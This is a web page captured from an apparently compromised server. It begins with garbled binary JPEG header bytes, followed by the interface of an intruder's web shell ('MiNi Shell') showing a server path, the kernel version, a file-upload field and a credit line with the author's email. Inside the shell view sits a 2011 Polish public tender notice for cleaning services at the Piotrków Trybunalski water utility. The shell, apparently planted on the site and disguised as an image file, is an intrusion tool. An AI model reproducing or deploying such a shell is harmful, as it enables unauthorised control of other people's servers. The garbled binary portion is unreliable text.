JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111214/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111214/329971-N-2011.html

<p class="kh_header"><b>Piotrków Trybunalski: SPRZĄTANIE POMIESZCZEŃ W BUDYNKACH  PIOTRKOWSKICH WODOCIĄGÓW  
I KANALIZACJI SP. Z O.O.</b><br>
<b>Numer ogłoszenia: 329971 - 2011; data zamieszczenia: 14.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Piotrkowskie Wodociągi i Kanalizacja Sp z o.o. , ul. Przemysłowa 4, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 44 646 15 66, faks 44 646 15 66.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Prawa Handlowego ze 100% udziałem Miasta Piotrków Trybunalski.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SPRZĄTANIE POMIESZCZEŃ W BUDYNKACH  PIOTRKOWSKICH WODOCIĄGÓW  
I KANALIZACJI SP. Z O.O..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprzątanie pomieszczeń w budynkach Piotrkowskich Wodociągów i Kanalizacji Sp. z o.o. 

SZCZEGÓŁOWE WARUNKI ZAMÓWIENIA:
1. Sprzątanie dotyczy obiektów:
1) Siedziba Piotrkowskich Wodociągów i Kanalizacji Sp. z o.o. przy ulicy Przemysłowej 4 - 
	a) powierzchnia do sprzątania - 1530,09 m2 
b) udostępnienie pomieszczeń na wykonywanie przedmiotowego zamówienia nastąpi  
       w dni powszednie w godzinach od 13.00 do  22:00.

2) Zakład Oczyszczalni Ścieków przy ul. Podole 7 na 9
	a)  powierzchnia do sprzątania -  900 m2
b)  przedmiotowe zamówienie wykonywane będzie w dni powszednie w godzinach  
     od 07.00 do  15:00.

3) Dział Ochrony Środowiska przy ul. Podole 7 na 9
	a)  powierzchnia do sprzątania - 743 m2
b) przedmiotowe zamówienie wykonywane będzie w dni powszednie w godzinach od
       08.00 do 15:00.

4) Zakład Ujęć Wody przy ul. Wojska Polskiego 205
	a)   powierzchnia do sprzątania - 234,32 m2
b)  przedmiotowe zamówienie wykonywane będzie w dni powszednie w godzinach  
      od  14.00 do  18:00.
5)	Utrzymanie czystości terenu zewnętrznego w Zakładzie Oczyszczalni Ścieków przy ul. Podole 7 na 9 przez 1 pracownika gospodarczego.
   a) przedmiotowa praca wykonywana będzie w dni powszednie w godzinach
             od 07.00 do  15:00 i obejmowała m.in. będzie:
		-  pielęgnację drzew i krzewów,  
- utrzymanie terenów zielonych (koszenie i wygrabianie traw, wygrabianie   
  liści, wywóz powstałych odpadów na kompost),
-  utrzymanie czystości ciągów pieszych i jezdnych, placów i parkingu latem
               i zimą,
-  malowanie ogrodzeń, barierek, drzwi, krawężników. 

2. Sprzątanie  pomieszczeń w budynkach Piotrkowskich Wodociągów i Kanalizacji Sp. z o.o. obejmować będzie następujące czynności:
a)	codziennie:
-	odkurzanie, mycie podłóg,
-	czyszczenie wycieraczek przy drzwiach wejściowych,
-	wycieranie kurzu z parapetów oraz grzejników,
-	czyszczenie mebli, tablic informacyjnych, 
-	mycie biurek, szaf, krzeseł, lamp oraz innych rzeczy znajdujących się 
w pomieszczeniach,
-	mycie luster, ścianek przeszklonych,
-	zdejmowanie ze ścian, sufitów oraz lamp pajęczyn, 
-	czyszczenie listew przypodłogowych, paneli,
-	odkurzanie wykładzin dywanowych przy użyciu odkurzaczy,
-	czyszczenie posadzki oraz schodów, odkurzanie, szorowanie, mycie schodów
wraz z poręczami,
-	mycie glazury w toaletach i kabinach prysznicowych,
-	mycie aneksu kuchennego,
-	gruntowne mycie i dezynfekcja toalet,
-	dbanie o wyposażenie sanitariatów w artykuły higieniczne - mydło w płynie, papier toaletowy, ręczniki papierowe, 
-	codzienne wyrzucanie śmieci oraz ich segregowanie do pojemników, wymiana worków plastikowych w koszach,
-	opróżnianie niszczarek dokumentów, 
-    sprzątanie piwnic oraz wg. potrzeb sprzątanie archiwum,
-    sprzątanie magazynu w budynku przy Przemysłowej 4,
-	utrzymanie w czystości  na zewnątrz budynku  przy wejściu do Piotrkowskich  Wodociągów i Kanalizacji Sp. z o.o. przy ul. Przemysłowej 4,  ul. Podole 7 na 9,    ul. Wojska Polskiego 205,
b)	raz w miesiącu:
- mycie skrzydeł drzwiowych i ościeżnic, znajdujących się w budynkach Piotrkowskich  Wodociągów i Kanalizacji Sp. z o.o. 
      c) dwa razy do roku 
- mycie okien  w pomieszczeniach Piotrkowskich  Wodociągów i Kanalizacji Sp. z o.o.  i cztery razy w roku  pranie firanek z pomieszczeń Spółki. Wykonawca ponosi również pełną odpowiedzialność za uszkodzenia i szkody powstałe podczas wykonywania  usługi sprzątania. Stwierdzone uszkodzenia, bądź braki wykonawca zobowiązany jest niezwłocznie usunąć na swój koszt.

d) Pomieszczenia wymienione poniżej:
- Magazynowe, 
- Kadrowe, 
- Serwerownia,
- Kasa,
- Sala Obsługi Klienta,
- Obrony cywilnej, 
- Płace
sprzątane będą codziennie w godzinach od 13.00 do 15.00.

2.	We wszystkich budynkach sprzątanie musi zakończyć się do godz. 2200.
3.	Wykonawca zapewni, że codzienne prace wykonywane będą przez co najmniej 6 stałych osób, w tym: 
- 1 osoba do utrzymania terenów zielonych w Zakładzie Oczyszczalni Ścieków przy ul. Podole 7 na 9,
- co najmniej  5 osób  do sprzątania pomieszczeń w pozostałych budynkach. 
4. Zamawiający ma prawo do jednostronnej zmiany terminów oraz godzin wykonywania usługi sprzątania, o których mowa wyżej. O zmianie Zamawiający powiadomi Wykonawcę faksem lub e-mailem.
5. Zamawiający zastrzega sobie prawo do zmiany ilości m2 sprzątanej powierzchni  i zobowiązuje się powiadomić Wykonawcę o takich zmianach z miesięcznym wyprzedzeniem.
6. Wykonawca  będzie zobowiązany do wykonywania w/w usług za pomocą powierzonych
środków czystości i narzędzi.
7. Wykonawca  zobowiązany jest do mycia okien dwa razy w roku (wiosną i jesienią),  prace winny być wykonane  przez osoby uprawnione do wykonywania prac na wysokości. 8.Wykonawca zobowiązany jest do sprzątania po remontach.
9.Wykonawca zobowiązany jest do przestrzegania przepisów z zakresu bhp i p.poż  w czasie wykonywania umowy.
10.Wykonawca zobowiązany jest do zachowania w tajemnicy wszystkich informacji dotyczących działalności Zamawiającego, o których dowiedział się w trakcie realizacji niniejszej umowy, jak również do pozostawienia w stanie nienaruszonym wszelkich materiałów, z którymi  z racji wykonywania umowy mógłby się zetknąć. 
11. Wykonawca wyznaczy osobę  koordynatora do zadań, do którego należeć będzie:
a)	czuwanie nad prawidłową realizacją przedmiotu umowy,
b)	codziennego monitorowania pracy personelu wykonującego usługę sprzątania w pomieszczeniach Piotrkowskich  Wodociągów i Kanalizacji Sp. z o.o. oraz odbioru wykonanych prac,
c)	dbałość o zabezpieczenie odpowiedniej ilości stałego personelu w budynkach,
d)	przestrzegania godzin pracy personelu, zgodnie z angażami,
e)	codziennego zapoznawania się z uwagami zapisanymi w zeszycie uwag,
f)	udział w komisyjnych, wyrywkowych sprawdzaniach jakości świadczonej usługi.
12. Osoba upoważniona przez Wykonawcę zobowiązana będzie do stałej kontroli zapisów  w Zeszycie uwag, który znajdować się będzie w Sekcji Organizacyjno-Informatycznej i Kadr. W przypadku stwierdzonych uchybień Wykonawca jest zobowiązany do niezwłocznego ich usunięcia.
13. Zamawiający zapewni Wykonawcy pomieszczenia, dostęp do wody i energii elektrycznej.                     
Powyższa lista nie jest listą zamkniętą i wskazuje jedynie na minimalny zakres prac niezbędnych do wykonania w celu zapewnienia należytej czystości.
Przed złożeniem oferty istnieje możliwość dokonania wizji lokalnej obiektów będących przedmiotem zamówienia, po uprzednim uzgodnieniu terminu z Kierownikiem Sekcji Organizacyjno-Informatycznej i Kadr, tel. 44 645 16 07. 
Zamawiający usługi:
1.	Zapewni środki oraz sprzęt do utrzymania czystości  w pomieszczeniach Piotrkowskich  Wodociągów i Kanalizacji Sp. z o.o.  
2.	Zapewni pomieszczenia socjalne dla pracowników Wykonawcy w poszczególnych obiektach.

Wykonawca usługi:
1.  Ponosi pełną odpowiedzialność za szkody wyrządzone zarówno Zamawiającemu, jak również osobom trzecim na skutek niewykonania lub nienależytego wykonania obowiązków określonych w umowie.
2.  W toku wykonywania przedmiotu umowy zobowiązuje się działać z należytą starannością.
3.	 Wyposaży swoich pracowników w niezbędne uniformy firmowe.
4. Zapewni stałą obsługę pracowników w poszczególnych obiektach Piotrkowskich Wodociągów i Kanalizacji Sp. z o.o.
5. Przedmiotowe zamówienie realizował będzie z wykorzystaniem własnych pracowników.
6. Osoby realizujące umowę ze strony Wykonawcy podlegają bezpośrednio Wykonawcy.

Warunki realizacji usługi:
Wykonawca zapewni, że codzienne prace wykonywane będą przez co najmniej 6 stałych osób, w tym: 
- 1 osoba do utrzymania zieleni w zakładzie Oczyszczalni Ścieków przy ul. Podole 7 na 9,
 -  co najmniej  5 osób  do sprzątania pomieszczeń w pozostałych budynkach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości  2 100 PLN
(słownie: dwa tysiące sto złotych) do dnia 20-12-2011 r. do godz. 14:00.
2. Wykonawca wnosi wadium w jednej lub kilku następujących formach:
1) pieniądzu wpłaconym przelewem na rachunek bankowy: 
            Nr r-ku: 03 1440 1257 0000 0000 1084 1402

Uwaga: Na poleceniu przelewu należy zamieścić adnotację: Wadium - przetarg nieograniczony na: SPRZĄTANIE POMIESZCZEŃ W BUDYNKACH  PIOTRKOWSKICH WODOCIĄGÓW  I KANALIZACJI SP. Z O.O.

2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t. Dz.U.  z 2007 r., Nr 42 poz. 275 z późn. zm.).
 
3. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za wniesione w terminie tylko wówczas, gdy wpłyną na rachunek bankowy Zamawiającego przed upływem terminu składania ofert.

Oryginał poręczeń i gwarancji należy przekazać za pokwitowaniem do sekretariatu  Zamawiającego, przed terminem składania ofert, a do oferty załączyć kserokopię.
Wykonawca, który nie wniesie wadium w wyznaczonym terminie zostanie wykluczony.
Terminowe wniesienie wadium (w każdej z dopuszczonych form jego wniesienia) Zamawiający sprawdzi w ramach własnych czynności proceduralnych.
4. Zwrot wadium nastąpi zgodnie z przepisami art. 46 ust. 1, 1a, 2, 4 ustawy.
5. Zamawiający zatrzyma wniesione przez Wykonawcę wadium w przypadku zaistnienia okoliczności wskazanych w przepisach art. 46 ust. 4a oraz ust. 5 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia, 
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy 
z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaże minimum 3 usługi wykonane w okresie ostatnich trzech lat, (a trwających co najmniej 12 miesięcy) przed upływem terminu składania ofert albo wniosków  o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających  swoim rodzajem (sprzątanie) usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, dat wykonania, wraz                 z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie (referencje</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku nastąpi w oparciu o przedłożoną przez Wykonawcę opłaconą polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na kwotę min. 100 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwik.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PIOTRKOWSKIE WODOCIĄGI I KANALIZACJA SP. Z O.O.
UL. PRZEMYSŁOWA 4
97-300 PIOTRKÓW TRYBUNALSKI.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2011 godzina 09:00, miejsce: PIOTRKOWSKIE WODOCIĄGI I KANALIZACJA SP. Z O.O.
UL. PRZEMYSŁOWA 4
97-300 PIOTRKÓW TRYBUNALSKI 
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com